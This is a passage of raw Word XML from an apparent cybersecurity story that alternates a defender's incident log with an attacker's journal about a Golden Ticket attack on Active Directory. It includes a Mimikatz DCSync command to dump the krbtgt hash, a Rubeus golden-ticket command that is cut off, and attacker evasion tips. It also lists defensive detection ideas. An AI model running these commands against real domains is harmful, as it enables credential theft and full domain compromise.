          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>f6aa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>c07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>-11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>d1-f79f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>-00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>c04fc2dcd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B41FB9" w14:textId="6B981C0D" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r>
        <w:t xml:space="preserve">That’s the GUID for </w:t>
      </w:r>
      <w:r w:rsidRPr="00853A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Replicating Directory Changes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00853A1F" w:rsidRPr="00853A1F">
        <w:t>The only way I know this by heart is because I once spent three hours at 2 AM frantically Googling it while my CISO texted me increasingly aggressive cat memes demanding updates, and now it's burned into my brain like a bad song lyric</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> – it’s like the equivalent of getting Rick Rolled except by cats</w:t>
      </w:r>
      <w:r w:rsidR="00853A1F" w:rsidRPr="00853A1F">
        <w:t>. I see it when I close my eyes. I mutter it in my sleep. My therapist says we should work on "healthy boundaries with LDAP," but she's not the one getting Slack-pinged at 3 AM because Karen from Accounting can't access her timesheet</w:t>
      </w:r>
      <w:r w:rsidR="00432D45">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0FA8D" w14:textId="674CAA30" w:rsidR="00432D45" w:rsidRDefault="00432D45" w:rsidP="0015466A">
      <w:r>
        <w:t>Speaking of cat memes – yes, I named one of my tarpit folders CAT_MEMES. Not because I’m clever, but because I have three cats, a broken sense of humor and a genuine belief that no attacker can resist the urge to see if someone’s embarrassing workplace cat photos are worth blackmailing over. Spoiler:</w:t>
      </w:r>
      <w:r w:rsidR="005B57F3">
        <w:t xml:space="preserve"> they’re not. They’re just pictures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1523E56C" w14:textId="3FB4986D" w:rsidR="0015466A" w:rsidRDefault="00FE1083" w:rsidP="0015466A">
      <w:r>
        <w:t>And o</w:t>
      </w:r>
      <w:r w:rsidR="0015466A">
        <w:t>h no. Oh no</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>ooo</w:t>
      </w:r>
      <w:r w:rsidR="0015466A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9A0F9" w14:textId="77777777" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> has DCSync rights. Someone with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> credentials can pull the password hash of </w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> account in the domain. Including </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t>. Including the Domain Admin accounts. Including every single user's hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F72B5" w14:textId="1C03B895" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r>
        <w:t>I just ran a manual check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FF56C" w14:textId="77777777" w:rsidR="00A40F32" w:rsidRDefault="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t># Simulating what an attacker would do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Invoke-Mimikatz -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"lsadump::dcsync /domain:corp.target.local /user:krbtgt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E0C74" w14:textId="77777777" w:rsidR="0015466A" w:rsidRPr="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve">I got the hash. I got the </w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>actual</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> hash. Because svc-backup has those rights. And if I can do it, so can whoever was on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> at 3:47 AM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FC9FE" w14:textId="5CC14BF0" w:rsidR="0015466A" w:rsidRPr="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve">This is a Category 1 incident. I'm escalating to the CISO, the IR team, and legal. But first, I need to understand the scope. If they have the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> hash, they can forge Golden Tickets. They can authenticate as anyone. They can bypass every access control we have. And we have </w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>no way to detect it</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>any type of legitimate</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> logging</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> in place</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA46D0D" w14:textId="1EE18489" w:rsidR="0015466A" w:rsidRPr="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The only thing that might save us is that forging a Golden Ticket happens </w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>offline</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve">. The attacker doesn't need to touch our network to create it. They only need to touch our network to </w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> it. Which means... </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve">it is quite possible that </w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve">they </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>haven't</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> used it yet. Or if they have, we can't see it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABF1771" w14:textId="77777777" w:rsidR="0015466A" w:rsidRPr="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:t>I need to check for anomalous TGT usage. Specifically, I'm looking for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860B391" w14:textId="67D1DFD1" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015466A">
        <w:t>TGTs with unusual lifetimes (default is 10 hours, but Golden Tickets are often forged with longer lifetimes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE6934" w14:textId="77777777" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015466A">
        <w:t>TGTs for non-existent or disabled accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486FFCF" w14:textId="77777777" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015466A">
        <w:t>TGT requests from unusual source IPs or workstations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6016DA75" w14:textId="79351581" w:rsidR="0015466A" w:rsidRPr="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015466A">
        <w:t>Service ticket requests (Event ID 4769) for high-value resources from unexpected accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633E1BF9" w14:textId="2EE6B51E" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve">I also need to rotate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="0015466A">
        <w:t xml:space="preserve"> password. Twice. Because Kerberos replication is weird — you have to rotate twice to ensure all DCs have the new key and all existing tickets are invalidated. But if I do that now, and the attacker is watching, they'll know we're onto them. They might accelerate their timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A910F8" w14:textId="77777777" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:t>I'm going to wait. Just a few hours. Long enough to get my detection in place, long enough to see if they make a move. Then I'm pulling the trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CFCA67" w14:textId="58ACC25B" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r w:rsidRPr="0015466A">
        <w:t>This is chess, not checkers. And I'm pretty sure I'm already down a queen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A18278F" w14:textId="59F83CCA" w:rsidR="0015466A" w:rsidRPr="00A40F32" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 5 – 0217</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930AB74" w14:textId="1CF56D18" w:rsidR="0015466A" w:rsidRPr="00A40F32" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CBEECA" w14:textId="44154E9F" w:rsidR="0015466A" w:rsidRDefault="00247E63" w:rsidP="0015466A">
      <w:r>
        <w:t xml:space="preserve">Forty-eight hours. Not a single alert. Not one firewall block. Not even a password reset on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t>. Either their SOC is comatose, or they genuinely have no idea what happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E9D45" w14:textId="165C9161" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="0015466A">
      <w:r>
        <w:t>I’m back. Fresh infrastructure – new VPN in Romania, new domain fronting through Azure CDN, new Cobalt Strike profile that looks like Slack traffic. I burned everything from the first phase. Clean slate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15818E34" w14:textId="330158DC" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="0015466A">
      <w:r>
        <w:t xml:space="preserve">Now comes the fun part. I have the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash. I have the domain SID. I have the FQDN. That’s all I really need to forge a Golden Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADDC3DE" w14:textId="6F94BB36" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="0015466A">
      <w:r>
        <w:t>Since these notes will be passed on to those who may come after me – let me explain what I’m actually doing here, because most people think it’s magic. It’s not. Maybe it’s my genius IQ lol but it really is just Kerberos being, well, Kerberos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC57E1C" w14:textId="5421BDEE" w:rsidR="00247E63" w:rsidRPr="00A40F32" w:rsidRDefault="00247E63" w:rsidP="00A40F32">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Random Wednesday" w:hAnsi="Random Wednesday"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Random Wednesday" w:hAnsi="Random Wednesday"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If I remember from TryHackMe, a normal Kerberos authentication flow works l</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Random Wednesday" w:hAnsi="Random Wednesday"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Random Wednesday" w:hAnsi="Random Wednesday"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ke this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEFCE52" w14:textId="77777777" w:rsidR="00A40F32" w:rsidRPr="00A40F32" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:r w:rsidRPr="00A40F32">
        <w:lastRenderedPageBreak/>
        <w:t>If I remember from TryHackMe, a normal Kerberos authentication flow works like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E24E8F" w14:textId="178039B8" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="00247E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User sends </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AS-REQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to KDC with their password hash encrypted timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944BA6D" w14:textId="61CD00EB" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="00247E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KDC verifies, sends back </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AS-REP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with TGT encrypted with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E8A64" w14:textId="1C7A273D" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="00247E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User presents TGT to KDC to request service tickets (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>TGS-REQ</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544D31E7" w14:textId="1A30AD59" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="00247E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KDC verifies TGT signature (using hash of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t>), sends TGS-REP with service ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3663F" w14:textId="631A6F72" w:rsidR="00247E63" w:rsidRDefault="00247E63" w:rsidP="00247E63">
      <w:r>
        <w:t xml:space="preserve">The Golden Ticket attack skips steps 1 and 2. I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the TGT myself, signed with the hash of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account. The KDC will then accept it as</w:t>
      </w:r>
      <w:r w:rsidR="00C72B94">
        <w:t xml:space="preserve"> legitimate because it can verify the signature. It won’t check if the user actually authenticated – it just checks if the ticket is properly signed. Nothing more. Nothing less.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023AFBD" w14:textId="1143D818" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00247E63">
      <w:r>
        <w:t>The ticket contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7CFE64" w14:textId="39317D5B" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Username (can be fake, can be real, can be anything, really, but to outwit defense teams, it’s smart to name it something that resembles</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> the naming conventions they use for their hosts and domain - you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blend in better</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> and they will probably just pass you off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as another</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> chatty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> workstation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61138194" w14:textId="789243EC" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Domain SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2380DA" w14:textId="7D6B838B" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Group memberships (I can claim Domain Admins, Enterprise Admins, Schema Admins, whatever)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035F8C8" w14:textId="1073E0FD" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ticket lifetime (I set this to 10 years because why not – no one on their side has noticed after two full days…what’s another</w:t>
      </w:r>
      <w:r w:rsidR="00FE1083">
        <w:t xml:space="preserve"> 3,648 days?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3777C7" w14:textId="1F18D8B2" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Various Kerberos flags and timestamps, which I don’t recall at the moment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0B276" w14:textId="0BE186A0" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r>
        <w:t>I forge it using Rubeus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DACFC" w14:textId="77777777" w:rsidR="00A40F32" w:rsidRDefault="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Rubeus.exe golden /user:fakeuser /id:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> /groups:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>513</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>518</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>519</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> /sid:S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
